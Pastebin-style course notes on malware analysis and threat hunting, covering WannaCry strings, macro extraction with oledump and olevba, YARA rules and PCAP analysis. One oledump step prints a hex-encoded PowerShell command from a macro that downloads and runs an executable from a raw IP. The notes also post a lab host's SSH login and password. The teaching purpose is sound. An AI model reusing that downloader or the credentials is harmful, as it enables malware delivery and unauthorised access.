joemccray

Advanced Malware Analysis 2020

Dec 22nd, 2019 (edited)
1,870
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #####################################################
  2. # Advanced Malware Analysis 2020 #
  3. # By Joe McCray #
  4. #####################################################
  5.  
  6. - Here is a good set of slides for getting started with Linux:
  7. http://www.slideshare.net/olafusimichael/linux-training-24086319
  8.  
  9.  
  10. - Here is a good tutorial that you should complete before doing the labs below:
  11. http://linuxsurvival.com/linux-tutorial-introduction/
  12.  
  13.  
  14. - I prefer to use Putty to SSH into my Linux host.
  15. - You can download Putty from here:
  16. - http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
  17.  
  18. Here is the information to put into putty
  19.  
  20. Host Name: 66.42.87.42
  21. protocol: ssh
  22. port: 22
  23. username: ama
  24. password: ama-secureninja!
  25.  
  26.  
  27.  
  28.  
  29. If you are on a Mac (https://osxdaily.com/2017/04/28/howto-ssh-client-mac/)
  30.  
  31. Open a terminal, then type:
  32. -------------------------------
  33. ssh -l ama 66.42.87.42
  34. ------------------------------
  35.  
  36.  
  37.  
  38. Indicators of Compromise (IoC)
  39. -----------------------------
  40.  
  41. 1. Modify the filesystem
  42. 2. Modify the registry - ADVAPI32.dll (persistance)
  43. 3. Modify processes/services
  44. 4. Connect to the network - WS2_32.dll
  45.  
  46.  
  47.  
  48. if you can't detect a registry change across 5% of your network
  49.  
  50.  
  51.  
  52. EDR Solution
  53. ------------
  54.  
  55.  
  56. 1. Static Analysis <----------------------------------------- Cloud based static analysis
  57. Learn everything I can without actually running the file
  58. - Modify FS - File integrity checker
  59. - Modify registry
  60. - Modify processes/services
  61. - Connect to the network
  62.  
  63.  
  64.  
  65. 2. Dynamic Analysis
  66. Runs the file in a VM/Sandbox
  67.  
  68. ################
  69. # The Scenario #
  70. ################
  71. You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
  72.  
  73.  
  74. The fastest thing you can do is perform static analysis.
  75.  
  76.  
  77.  
  78.  
  79. ###################
  80. # Static Analysis #
  81. ###################
  82.  
  83. ---------------------------Type This-----------------------------------
  84.  
  85. cd ~/static_analysis
  86.  
  87. file wannacry.exe
  88.  
  89. cp wannacry.exe malware.pdf
  90.  
  91. file malware.pdf
  92.  
  93. hexdump -n 2 -C wannacry.exe
  94.  
  95. ----------------------------------------------------------------------
  96.  
  97.  
  98. ***What is '4d 5a' or 'MZ'***
  99. -------------------------Paste this URL into Firefox-----------------------------------
  100. http://www.garykessler.net/library/file_sigs.html
  101. ---------------------------------------------------------------------------------------
  102.  
  103.  
  104.  
  105. ---------------------------Type This-----------------------------------
  106. cd ~/static_analysis
  107.  
  108. objdump -x wannacry.exe
  109.  
  110. objdump -x wannacry.exe | less
  111. q
  112.  
  113. strings wannacry.exe
  114.  
  115. strings wannacry.exe | grep -i dll
  116.  
  117. strings wannacry.exe | grep -i library
  118.  
  119. strings wannacry.exe | grep -i reg
  120.  
  121. strings wannacry.exe | grep -i key
  122.  
  123. strings wannacry.exe | grep -i rsa
  124.  
  125. strings wannacry.exe | grep -i open
  126.  
  127. strings wannacry.exe | grep -i get
  128.  
  129. strings wannacry.exe | grep -i mutex
  130.  
  131. strings wannacry.exe | grep -i irc
  132.  
  133. strings wannacry.exe | grep -i join
  134.  
  135. strings wannacry.exe | grep -i admin
  136.  
  137. strings wannacry.exe | grep -i list
  138. ----------------------------------------------------------------------
  139.  
  140.  
  141.  
  142.  
  143.  
  144.  
  145.  
  146. Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
  147.  
  148. Quick Google search for "wannacry ransomeware analysis"
  149.  
  150.  
  151. Reference
  152. https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
  153.  
  154. - Yara Rule -
  155.  
  156.  
  157. Strings:
  158. $s1 = “Ooops, your files have been encrypted!” wide ascii nocase
  159. $s2 = “Wanna Decryptor” wide ascii nocase
  160. $s3 = “.wcry” wide ascii nocase
  161. $s4 = “WANNACRY” wide ascii nocase
  162. $s5 = “WANACRY!” wide ascii nocase
  163. $s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase
  164.  
  165.  
  166.  
  167.  
  168.  
  169.  
  170.  
  171. Ok, let's look for the individual strings
  172.  
  173.  
  174. ---------------------------Type This-----------------------------------
  175. cd ~/static_analysis
  176.  
  177. strings wannacry.exe | grep -i ooops
  178.  
  179. strings wannacry.exe | grep -i wanna
  180.  
  181. strings wannacry.exe | grep -i wcry
  182.  
  183. strings wannacry.exe | grep -i wannacry
  184.  
  185. strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
  186. ----------------------------------------------------------------------
  187.  
  188.  
  189.  
  190.  
  191.  
  192. ####################################
  193. # Tired of GREP - let's try Python #
  194. ####################################
  195. Decided to make my own script for this kind of stuff in the future. This is a really good script for the basics of static analysis
  196.  
  197. Reference:
  198. https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
  199.  
  200.  
  201. This is really good for showing some good signatures to add to the Python script
  202.  
  203.  
  204. ---------------------------Type This-----------------------------------
  205. cd ~/static_analysis
  206.  
  207. nano original_am.py
  208. ctrl-x
  209.  
  210. python3 original_am.py wannacry.exe
  211. ----------------------------------------------------------------------
  212.  
  213.  
  214. #####################################################
  215. # Analyzing Macro Embedded Malware #
  216. #####################################################
  217. ---------------------------Type This-----------------------------------
  218. cd ~/static_analysis/oledump
  219.  
  220. python oledump.py 064016.doc
  221.  
  222. python oledump.py 064016.doc -s A4 -v
  223. -----------------------------------------------------------------------
  224.  
  225.  
  226.  
  227. - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
  228. - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
  229.  
  230. ---------------------------Type This-----------------------------------
  231. python oledump.py 064016.doc -s A5 -v
  232. -----------------------------------------------------------------------
  233.  
  234. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
  235.  
  236. ---------------------------Type This-----------------------------------
  237. python oledump.py 064016.doc -s A3 -v
  238.  
  239. - Look for "GVhkjbjv" and you should see:
  240.  
  241. 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
  242.  
  243. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
  244. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
  245. -----------------------------------------------------------------------
  246.  
  247.  
  248.  
  249.  
  250. #########################################
  251. # Security Operations Center Job Roles #
  252. # Intrusion Analysis Level 1 #
  253. #########################################
  254. Required Technical Skills: Comfortable with basic Linux/Windows (MCSA/Linux+)
  255. Comfortable with basic network (Network+)
  256. Comfortable with security fundamentals (Security+)
  257.  
  258.  
  259.  
  260.  
  261.  
  262. Job Task: Process security events, follow incident response triage playbook
  263.  
  264. #########################################
  265. # Security Operations Center Job Roles #
  266. # Intrusion Analysis Level 2 #
  267. #########################################
  268.  
  269. Required Technical Skills: Comfortable with basic Linux/Windows system administration
  270. Comfortable with basic network administration
  271. Comfortable with basic programming
  272. Comfortable researching IT security issues
  273.  
  274.  
  275.  
  276.  
  277.  
  278. Job Task: Perform detailed malware analysis, assist with development of the incident response triage playbook
  279.  
  280. #########################################
  281. # Security Operations Center Job Roles #
  282. # Intrusion Analysis Level 3 #
  283. #########################################
  284.  
  285. Required Technical Skills: Strong statistical analysis background
  286. Strong programming background (C, C++, Java, Assembly, scripting languages)
  287. Advanced system/network administration background
  288. Comfortable researching IT security issues
  289.  
  290.  
  291.  
  292.  
  293.  
  294. Job Task: Perform detailed malware analysis
  295. Perform detailed statistical analysis
  296. Assist with development of the incident response triage playbook
  297.  
  298.  
  299.  
  300.  
  301. -------------------------------------------------------------------------------------------------------------------------
  302.  
  303. Step 1: Receive suspicious file
  304. -------------------------------
  305. - Help Desk tickets
  306. - SIEM
  307. - AV
  308. - EDR
  309. - Email/Spam
  310. - Proxy
  311.  
  312.  
  313.  
  314. Step 2: Perform static analysis
  315. -------------------------------
  316. 1. Run strings/grep for primary IoCs
  317. - Modifies the registry
  318. - Modifies processes/services
  319. - Modifies the filesystem
  320. - Connects to the network
  321.  
  322. A yes to these should help you determine whether you want to do dynamic analysis or not
  323.  
  324. Consideration 1: Encryption/Obfuscation - you may have to do dynamic analysis
  325.  
  326. Consideration 2: If you dealing with anti-analysis - you may have to do static analysis
  327.  
  328.  
  329.  
  330.  
  331.  
  332. Step 3: Determine if the malware modifies the registry
  333. ------------------------------------------------------
  334.  
  335.  
  336. ---------------------------Type This-----------------------------------
  337. cd ~/static_analysis/
  338.  
  339. strings wannacry.exe | grep -i reg
  340.  
  341. strings wannacry.exe | grep -i hkcu
  342.  
  343. strings wannacry.exe | grep -i hklm
  344.  
  345. strings wannacry.exe | grep -i hkcr
  346. -----------------------------------------------------------------------
  347.  
  348.  
  349.  
  350. Step 4: Determine if the malware modifies processes/services
  351. ------------------------------------------------------------
  352.  
  353. ---------------------------Type This-----------------------------------
  354. cd ~/static_analysis/
  355. strings wannacry.exe | grep -i advapi32
  356.  
  357. strings wannacry.exe | grep -i service
  358.  
  359. strings wannacry.exe | grep -i OpenSCManagerA
  360.  
  361. strings wannacry.exe | grep -i OpenSCManagerA
  362.  
  363. strings wannacry.exe | grep -i InternetCloseHandle
  364.  
  365. strings wannacry.exe | grep -i OpenServiceA
  366.  
  367. strings wannacry.exe | grep -i CloseServiceHandle
  368.  
  369. strings wannacry.exe | grep -i StartServiceCtrlDispatcherA
  370.  
  371. strings wannacry.exe | grep -i GetExitCodeProcess
  372.  
  373. strings wannacry.exe | grep -i GetProcAddress
  374. -----------------------------------------------------------------------
  375.  
  376.  
  377.  
  378. Step 4: Determine if the malware modifies the file system
  379. ------------------------------------------------------------
  380.  
  381. ---------------------------Type This-----------------------------------
  382. cd ~/static_analysis/
  383. strings wannacry.exe | grep -i GetTempPathW
  384.  
  385. strings wannacry.exe | grep -i GetWindowsDirectoryW
  386.  
  387. strings wannacry.exe | grep -i %TEMP%
  388.  
  389. strings wannacry.exe | grep -i GetFileAttributesA
  390. -----------------------------------------------------------------------
  391.  
  392.  
  393.  
  394.  
  395.  
  396. Step 5: Does the malware have any persistence capability
  397. --------------------------------------------------------
  398. 3 main ways for an attacker to maintain access to a compromised system (persistence)
  399.  
  400. - Registry
  401. - Service
  402. - Scheduled task
  403.  
  404.  
  405.  
  406.  
  407. ##############
  408. # Class task #
  409. ##############
  410.  
  411. Task 1: Go to https://joesecurity.org/joe-sandbox-reports
  412.  
  413. Identify 5 reports for malware that are similar to what you've seen or been concerned about in your environment
  414.  
  415. 1. Maze
  416. 2. Bad rabbit
  417. 3. Trojanized Adobe Installer
  418. 4. Emotel
  419. 5. bitcoin miner
  420.  
  421.  
  422.  
  423. Task 2: What do you want to be able to find
  424. What did you see in each of these reports that you found interesting and would like to be able to look for in your investigations?
  425.  
  426. Task 3: Identify the unique strings that you would like to search for
  427. 1.
  428. 2.
  429. 3.
  430.  
  431.  
  432. Task 4: Unique classes of attack
  433. Identify the unique classes of signatures that interest us the most that are NOT in my am.py file list
  434. 1. Trickier http request methods
  435. 2. Dynamic libraries/API calls
  436. 3. Lateral movement
  437.  
  438.  
  439.  
  440. Task 5: Identify limitations of the script
  441. 1. Only analyzes exes
  442. 2. Too many functions and no classes
  443. 3. Not modular enough
  444. 4. Signature list is not very thorough
  445. 5. Doesn't save to db
  446.  
  447.  
  448.  
  449. ---------------------------Type This-----------------------------------
  450. cd /home/ama/malware_samples/office-doc_files
  451.  
  452. file sample1.doc
  453.  
  454. olevba sample1.doc
  455.  
  456. python /home/ama/static_analysis/oledump/oledump.py sample1.doc
  457. ----------------------------------------------------------------------
  458.  
  459.  
  460. What is oledump.py?
  461. ===================
  462.  
  463. Reference: https://blog.didierstevens.com/programs/oledump-py/
  464.  
  465. oledump.py is a program to analyze OLE files (Compound File Binary Format). These files contain streams of data. oledump allows you to analyze these streams.
  466.  
  467. Many applications use this file format, the best known is MS Office. .doc, .xls, .ppt, … are OLE files (docx, xlsx, … is the new file format: XML inside ZIP).
  468.  
  469.  
  470.  
  471. What is olevba?
  472. ===============
  473.  
  474. Reference: https://github.com/decalage2/oletools/wiki/olevba
  475.  
  476. olevba is a script to parse OLE and OpenXML files such as MS Office documents (e.g. Word, Excel), to detect VBA Macros, extract their source code in clear text, and detect security-related patterns such as auto-executable macros, suspicious VBA keywords used by malware, anti-sandboxing and anti-virtualization techniques, and potential IOCs (IP addresses, URLs, executable filenames, etc). It also detects and decodes several common obfuscation methods including Hex encoding, StrReverse, Base64, Dridex, VBA expressions, and extracts IOCs from decoded strings. XLM/Excel 4 Macros are also supported in Excel and SLK files.
  477.  
  478. It can be used either as a command-line tool, or as a python module from your own applications.
  479.  
  480. It is part of the python-oletools package.
  481.  
  482.  
  483. Now let's dig in with oledump
  484.  
  485.  
  486.  
  487. ---------------------------Type This-----------------------------------
  488. cd /home/ama/malware_samples/office-doc_files
  489.  
  490. python /home/ama/static_analysis/oledump/oledump.py sample1.doc -s A7 -v
  491.  
  492. python /home/ama/static_analysis/oledump/oledump.py sample1.doc -s A8 -v
  493.  
  494. python /home/ama/static_analysis/oledump/oledump.py sample1.doc -s A9 -v
  495. ----------------------------------------------------------------------
  496.  
  497.  
  498.  
  499.  
  500.  
  501.  
  502. Now let's dig in with olevba
  503.  
  504.  
  505.  
  506. ---------------------------Type This-----------------------------------
  507. cd /home/ama/malware_samples/office-doc_files
  508.  
  509. olevba sample1.doc --decode
  510.  
  511. olevba sample1.doc --deobf
  512. ----------------------------------------------------------------------
  513.  
  514.  
  515.  
  516. ###########
  517. ############################## EXE Files ###############################
  518. ###########
  519.  
  520. OK, let's take a look at exe files
  521.  
  522.  
  523.  
  524. ---------------------------Type This-----------------------------------
  525. cd /home/ama/malware_samples/exe_files
  526.  
  527. objdump -x sample1.exe
  528.  
  529. objdump -x sample1.exe | less
  530. q
  531.  
  532. strings sample1.exe
  533.  
  534. strings sample1.exe | grep -i dll
  535.  
  536. strings sample1.exe | grep -i library
  537.  
  538. strings sample1.exe | grep -i reg
  539.  
  540. strings sample1.exe | grep -i key
  541.  
  542. strings sample1.exe | grep -i rsa
  543.  
  544. strings sample1.exe | grep -i open
  545.  
  546. strings sample1.exe | grep -i get
  547.  
  548. strings sample1.exe | grep -i mutex
  549.  
  550. strings sample1.exe | grep -i irc
  551.  
  552. strings sample1.exe | grep -i join
  553.  
  554. strings sample1.exe | grep -i admin
  555.  
  556. strings sample1.exe | grep -i list
  557.  
  558. python3 ~/static_analysis/previous_class_am.py sample1.exe
  559. ----------------------------------------------------------------------
  560.  
  561.  
  562.  
  563. Let's play with another tool called pyew.
  564.  
  565.  
  566. Reference: https://github.com/joxeankoret/pyew
  567.  
  568. Pyew is a tool like radare or biew/hiew. It’s an hexadecimal viewer, disassembler for IA32 and AMD64 with support for PE & ELF formats as well as other non executable formats, like OLE2 or PDF.
  569.  
  570.  
  571.  
  572.  
  573. ---------------------------Type This-----------------------------------
  574. pyew sample1.exe
  575.  
  576. [0x00000000]> ?
  577.  
  578. [0x00000000]> md5
  579.  
  580. [0x00000000]> sha256
  581.  
  582. [0x00000000]> url
  583.  
  584. [0x00000000]> chkurl
  585. ----------------------------------------------------------------------
  586.  
  587. Since this is a PE file, let's do some stuff that's specific for exe files
  588.  
  589. Here are the commands again:
  590. Commands:
  591.  
  592. ?/help Show this help
  593. x/dump/hexdump Show hexadecimal dump
  594. s/seek Seek to a new offset
  595. g/G Goto BOF (g) or EOF (G)
  596. +/- Go forward/backward one block (specified by pyew.bsize)
  597. c/d/dis/pd Show disassembly
  598. r/repr Show string represantation
  599. p Print the buffer
  600. /x expr Search hexadecimal string
  601. /s expr Search strings
  602. /i expr Search string ignoring case
  603. /r expr Search regular expression
  604. /u expr Search unicode expression
  605. /U expr Search unicode expression ignoring case
  606.  
  607.  
  608. Now, let's see the disassembly at the entry point so, seek to the entry point:
  609. ---------------------------Type This-----------------------------------
  610. [0x00000000]> s ep
  611. -----------------------------------------------------------------------
  612.  
  613.  
  614. And disassemble it with the command "c" (you may also use "d", "dis" or "pd"):
  615. ---------------------------Type This-----------------------------------
  616. [0x00025ce0:0x00426ae0]> c
  617. -----------------------------------------------------------------------
  618.  
  619. To see the code at the function's position, just type the number assigned to the function (the number after the ";" character):
  620. ---------------------------Type This-----------------------------------
  621. [0x00025ce0:0x00426ae0]> 1
  622. [0x00025d07:0x00426b07]> 2
  623. -----------------------------------------------------------------------
  624.  
  625.  
  626.  
  627. OK, we're done analyzing this function. To go back to the prior point (the entry point in our case) we can type "b" to go back:
  628. ---------------------------Type This-----------------------------------
  629. [0x00025d07:0x00426b07]> b
  630. -----------------------------------------------------------------------
  631.  
  632.  
  633. To continue seeing more disassembly just press the enter key to see the next block's disasembly (BTW, if the last command was "x" to show the hexadecimal dump, by pressing enter you would see the next block's hexadecimal dump):
  634.  
  635.  
  636.  
  637. To list the functions detected by Pyew type "pyew.names":
  638. ---------------------------Type This-----------------------------------
  639. [0x00025cfe:0x00426afe]> pyew.names
  640. -----------------------------------------------------------------------
  641.  
  642.  
  643. Let's see if it was packed
  644. ---------------------------Type This-----------------------------------
  645. [0x00025ce0:0x00426ae0]> packer
  646. -----------------------------------------------------------------------
  647.  
  648.  
  649. Let's see if it uses any anti virutal machine tricks
  650. ---------------------------Type This-----------------------------------
  651. [0x00025ce0:0x00426ae0]> antivm
  652. -----------------------------------------------------------------------
  653.  
  654.  
  655.  
  656.  
  657.  
  658.  
  659.  
  660. ##############
  661. # Yara Ninja #
  662. ##############
  663. Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
  664.  
  665. Quick Google search for "wannacry ransomeware analysis"
  666.  
  667.  
  668. Reference
  669. https://www.mcafee.com/blogs/other-blogs/executive-perspectives/analysis-wannacry-ransomware-outbreak/
  670.  
  671.  
  672.  
  673. - Yara Rule -
  674.  
  675.  
  676. Strings:
  677. $s1 = “Ooops, your files have been encrypted!” wide ascii nocase
  678. $s2 = “Wanna Decryptor” wide ascii nocase
  679. $s3 = “.wcry” wide ascii nocase
  680. $s4 = “WANNACRY” wide ascii nocase
  681. $s5 = “WANACRY!” wide ascii nocase
  682. $s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase
  683.  
  684.  
  685.  
  686.  
  687.  
  688.  
  689.  
  690.  
  691. Ok, let's look for the individual strings
  692.  
  693. ---------------------------Type This-----------------------------------
  694.  
  695.  
  696. strings wannacry.exe | grep -i ooops
  697.  
  698. strings wannacry.exe | grep -i wanna
  699.  
  700. strings wannacry.exe | grep -i wcry
  701.  
  702. strings wannacry.exe | grep -i wannacry
  703.  
  704. strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
  705.  
  706.  
  707. -----------------------------------------------------------------------
  708.  
  709.  
  710. #####################
  711. # Playing with Yara #
  712. #####################
  713. Let's see if we can get yara working.
  714.  
  715.  
  716.  
  717.  
  718.  
  719.  
  720.  
  721. ---------------------------Type This-----------------------------------
  722. cd ~/students/
  723.  
  724. mkdir [yourname]
  725.  
  726. cd [yourname]
  727.  
  728. cp ~/wannacry.exe .
  729.  
  730. nano wannacry_1.yar
  731.  
  732. ---------------------------Paste This-----------------------------------
  733. rule wannacry_1 : ransom
  734. {
  735. meta:
  736. author = "Joshua Cannell"
  737. description = "WannaCry Ransomware strings"
  738. weight = 100
  739. date = "2017-05-12"
  740.  
  741. strings:
  742. $s1 = "Ooops, your files have been encrypted!" wide ascii nocase
  743. $s2 = "Wanna Decryptor" wide ascii nocase
  744. $s3 = ".wcry" wide ascii nocase
  745. $s4 = "WANNACRY" wide ascii nocase
  746. $s5 = "WANACRY!" wide ascii nocase
  747. $s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
  748.  
  749. condition:
  750. any of them
  751. }
  752.  
  753. ----------------------------------------------------------------------------
  754.  
  755.  
  756.  
  757.  
  758.  
  759. ---------------------------Type This-----------------------------------
  760.  
  761. yara wannacry_1.yar wannacry.exe
  762.  
  763. -----------------------------------------------------------------------
  764.  
  765.  
  766.  
  767.  
  768.  
  769. ---------------------------Type This-----------------------------------
  770.  
  771. nano wannacry_2.yar
  772.  
  773. ---------------------------Paste This-----------------------------------
  774. rule wannacry_2{
  775. meta:
  776. author = "Harold Ogden"
  777. description = "WannaCry Ransomware Strings"
  778. date = "2017-05-12"
  779. weight = 100
  780.  
  781. strings:
  782. $string1 = "msg/m_bulgarian.wnry"
  783. $string2 = "msg/m_chinese (simplified).wnry"
  784. $string3 = "msg/m_chinese (traditional).wnry"
  785. $string4 = "msg/m_croatian.wnry"
  786. $string5 = "msg/m_czech.wnry"
  787. $string6 = "msg/m_danish.wnry"
  788. $string7 = "msg/m_dutch.wnry"
  789. $string8 = "msg/m_english.wnry"
  790. $string9 = "msg/m_filipino.wnry"
  791. $string10 = "msg/m_finnish.wnry"
  792. $string11 = "msg/m_french.wnry"
  793. $string12 = "msg/m_german.wnry"
  794. $string13 = "msg/m_greek.wnry"
  795. $string14 = "msg/m_indonesian.wnry"
  796. $string15 = "msg/m_italian.wnry"
  797. $string16 = "msg/m_japanese.wnry"
  798. $string17 = "msg/m_korean.wnry"
  799. $string18 = "msg/m_latvian.wnry"
  800. $string19 = "msg/m_norwegian.wnry"
  801. $string20 = "msg/m_polish.wnry"
  802. $string21 = "msg/m_portuguese.wnry"
  803. $string22 = "msg/m_romanian.wnry"
  804. $string23 = "msg/m_russian.wnry"
  805. $string24 = "msg/m_slovak.wnry"
  806. $string25 = "msg/m_spanish.wnry"
  807. $string26 = "msg/m_swedish.wnry"
  808. $string27 = "msg/m_turkish.wnry"
  809. $string28 = "msg/m_vietnamese.wnry"
  810.  
  811.  
  812. condition:
  813. any of ($string*)
  814. }
  815. ----------------------------------------------------------------------------
  816.  
  817.  
  818.  
  819.  
  820.  
  821.  
  822.  
  823.  
  824. ---------------------------Type This-----------------------------------
  825.  
  826. yara wannacry_2.yar wannacry.exe
  827.  
  828. -----------------------------------------------------------------------
  829.  
  830.  
  831.  
  832. ---------------------------Type This-----------------------------------
  833. cd ~
  834.  
  835. yara rules/index.yar wannacry.exe
  836.  
  837. cd rules/
  838.  
  839. ls
  840.  
  841. cd malware/
  842.  
  843. ls | grep -i ransom
  844.  
  845. ls | grep -i rat
  846.  
  847. ls | grep -i toolkit
  848.  
  849. ls | grep -i apt
  850.  
  851. cd ..
  852.  
  853. cd capabilities/
  854.  
  855. ls
  856.  
  857. cat capabilities.yar
  858.  
  859. cd ..
  860.  
  861. cd cve_rules/
  862.  
  863. ls
  864.  
  865. cd ..
  866.  
  867. ./index_gen.sh
  868.  
  869. cd ..
  870.  
  871. yara rules/index.yar wannacry.exe
  872.  
  873. yara rules/index.yar wannacry.exe > ~/students/[yourname]/blah
  874.  
  875. cd ~/students/[yourname]
  876.  
  877. cat blah | grep -v warning
  878.  
  879.  
  880.  
  881.  
  882. -----------------------------------------------------------------------
  883.  
  884.  
  885.  
  886.  
  887. ###############################
  888. ----------- ############### # Threat Hunting on the wire # ############### -----------
  889. ###############################
  890.  
  891.  
  892.  
  893.  
  894. ##################################################################
  895. # Analyzing a PCAP Prads #
  896. # Note: run as regular user #
  897. ##################################################################
  898.  
  899. ---------------------------Type this as a regular user----------------------------------
  900.  
  901. cd ~/pcap_analysis/prads
  902.  
  903. prads -r suspicious-time.pcap -l prads-asset.log
  904.  
  905. cat prads-asset.log | less
  906.  
  907. cat prads-asset.log | grep SYN | grep -iE 'windows|linux'
  908.  
  909. cat prads-asset.log | grep CLIENT | grep -iE 'safari|firefox|opera|chrome'
  910.  
  911. cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'
  912. -----------------------------------------------------------------------
  913.  
  914.  
  915.  
  916.  
  917. ##################################
  918. # PCAP Analysis with ChaosReader #
  919. # Note: run as regular user #
  920. ##################################
  921. ---------------------------Type this as a regular user----------------------------------
  922.  
  923. cd ~/pcap_analysis/chaos_reader/
  924.  
  925. perl chaosreader.pl suspicious-time.pcap
  926.  
  927. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
  928.  
  929. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
  930.  
  931.  
  932. for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
  933.  
  934.  
  935.  
  936. for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u | awk '{print $5}' > url.lst
  937.  
  938.  
  939. python check-urls-virustotal.py url.lst
  940.  
  941. ------------------------------------------------------------------------
  942.  
  943.  
  944.  
  945.  
  946.  
  947.  
  948.  
  949.  
  950. #############################
  951. # PCAP Analysis with tshark #
  952. # Note: run as regular user #
  953. #############################
  954. ---------------------------Type this as a regular user---------------------------------
  955. cd ~/pcap_analysis/tshark
  956.  
  957. tshark -i ens3 -r suspicious-time.pcap -qz io,phs
  958.  
  959. tshark -r suspicious-time.pcap -qz ip_hosts,tree
  960.  
  961. tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
  962.  
  963. tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
  964.  
  965.  
  966. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
  967.  
  968. whois rapidshare.com.eyu32.ru
  969.  
  970. whois sploitme.com.cn
  971.  
  972. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
  973.  
  974. tshark -r suspicious-time.pcap -qz http_req,tree
  975.  
  976. tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
  977.  
  978. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
  979. ------------------------------------------------------------------------
  980.  
  981.  
  982. ###############################
  983. # Extracting files from PCAPs #
  984. # Note: run as regular user #
  985. ###############################
  986. ---------------------------Type this as a regular user---------------------------------
  987.  
  988. cd ~/pcap_analysis/extract_files
  989.  
  990. foremost -v -i suspicious-time.pcap
  991.  
  992. cd output
  993.  
  994. ls
  995.  
  996. cat audit.txt
  997.  
  998. cd exe
  999.  
  1000. wget https://raw.githubusercontent.com/GREEKYnikhilsharma/Xen0ph0n-VirusTotal_API_Tool-Python3/master/vtlite.py
  1001.  
  1002. ******* NOTE: You will need to put your virustotal API key in vtlite.py *******
  1003.  
  1004. for f in *.exe; do python3 vtlite.py -s $f; sleep 15; done
  1005. ---------------------------------------------------------------------------------------
  1006.  
  1007.  
  1008.  
  1009. ###################################
  1010. # Setting up Suricata #
  1011. # Note: run as root user #
  1012. ###################################
  1013.  
  1014.  
  1015. Here is where we will setup all of the required dependencies for the tools we plan to install
  1016. ---------------------------Type this as root--------------------------
  1017. apt update
  1018. apt-get install -y libpcre3-dbg libpcre3-dev autoconf automake libtool libpcap-dev libnet1-dev libyaml-dev libjansson4 libcap-ng-dev libmagic-dev libjansson-dev zlib1g-dev libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev cmake make gcc g++ flex bison libpcap-dev libssl-dev unzip python-dev swig zlib1g-dev sendmail sendmail-bin prads tcpflow python-scapy python-yara tshark whois jq prads foremost python3-dnspython
  1019. -----------------------------------------------------------------------
  1020.  
  1021.  
  1022.  
  1023.  
  1024. Now we install Suricata
  1025. ---------------------------Type this as root-------------------------------
  1026. cd /root/
  1027.  
  1028. wget https://www.openinfosecfoundation.org/download/suricata-4.0.5.tar.gz
  1029.  
  1030. tar -zxvf suricata-4.0.5.tar.gz
  1031.  
  1032. cd suricata-4.0.5
  1033.  
  1034. ./configure --enable-nfqueue --prefix=/usr --sysconfdir=/etc --localstatedir=/var
  1035.  
  1036. make
  1037.  
  1038. make install
  1039.  
  1040. make install-conf
  1041.  
  1042. cd rules
  1043.  
  1044. cp *.rules /etc/suricata/rules/
  1045.  
  1046. cd /etc/suricata/
  1047.  
  1048. wget https://rules.emergingthreats.net/open/suricata-4.0/emerging.rules.tar.gz
  1049.  
  1050. tar -zxvf emerging.rules.tar.gz
  1051. -----------------------------------------------------------------------
  1052.  
  1053.  
  1054.  
  1055.  
  1056.  
